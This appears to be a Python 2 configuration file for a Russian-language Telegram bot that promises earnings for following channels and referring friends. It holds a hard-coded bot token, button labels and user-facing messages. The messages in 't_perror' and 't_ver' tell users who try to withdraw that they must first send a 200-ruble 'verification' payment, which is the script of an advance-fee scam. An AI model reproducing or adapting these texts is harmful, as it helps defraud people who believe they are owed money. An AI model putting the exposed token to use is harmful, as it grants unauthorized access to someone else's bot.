# coding=utf-8
import sys
import os.path

reload(sys)
sys.setdefaultencoding('utf8')

token = "693042992:AAG_3QZporCPkj-wWJZ8mWmfpM_pBfkrsEc"


host = ""
usr = ""
password = ""
db = ""

admin = [] # ID админов

#buttons
b_check = "check_follow"
b_next = "next_follow"
b_balance = "💳 Вывести"
b_earn = "💵 Заработать"
b_profile = "👤 Аккаунт"
b_phone = "📱 Телефон"
b_qiwi = "🥝 Qiwi"
b_ya = "👛 Я.Кошелек"
b_card = "💳 Карта"
b_home = "🏠 Домой"
b_partner = "👫 Партнерам"
b_more = "🤑 Больше денег"
b_tg = "Telegram"
b_inst = "Instagram"


b_admin = "🤖 Администратор"
b_msg = "📬 Рассылка"
b_ppl_count = "🙋‍♂️ Люди"
b_addch = "➕ Добавить канал"
b_delch = "📋 Список каналов"
b_del = "delete"
b_send_all = "📦 Отправить всем"
b_cancel = "🚫 Отменить отправку"

#text
t_hello = "Хочешь начать зарабатывать в социальных сетях? Тогда присоединяйся и начнай делать деньги… 💰"
t_addch = "*Действия при добавлении канала в бота:*\n\n1. Добавить бота в администраторы канала и *разрешить ему приглашать других пользователей* (делается в настройках канала с аккаунта создателя канала)\n\n2. Переслать любое сообщение из канала в бота, предварительно нажав кнопку \"" + b_addch + "\""
t_soc = "Выбери социальную сеть 👇"
t_main = "Выбери пункт меню 👇"
t_out="----------\nЕсли хотите вывести средства, то выберите куда их зачислить."
t_appl = "Заявка на вывод средств сформирована.\nПроцесс рассмотрения заявки составляет 1-2 рабочих дня. \n*Вам будет начислено:* "
t_berror = "Мы выводим суммы от 1 рубля. Подзаработайте еще чуть-чуть и возвращайтесь :)"
t_perror = "Кажется Ваш аккаунт неверифицирован.\nПожалуйста, *пройдите процесс верификации*, в противном случае заявка на вывод денежных средств не будет обработана."
t_ver = "Для прохождения верификации отправьте нам тестовый платеж размером *200р*.\n\nДанная сумма будет начислена на Ваш аккаунт в боте, а в дальнейшем может быть выведена.\n\nПосле прохождения верификации статус вашего аккаунта будет изменен на \"*Верифицирован*\".\n\nПодробнее о данном статусе - /info\n\nВыберите способ оплаты 👇"
t_partner = "За каждого приглашенного пользователя вы получаете 15 рублей! Делитесь ссылкой и зарабатывайте вместе!\n\nВаша ссылка: "


# images
img_yamoney = os.path.abspath("yamoney.jpg")
img_card = os.path.abspath("card.jpg")
img_list = os.path.abspath("list.png")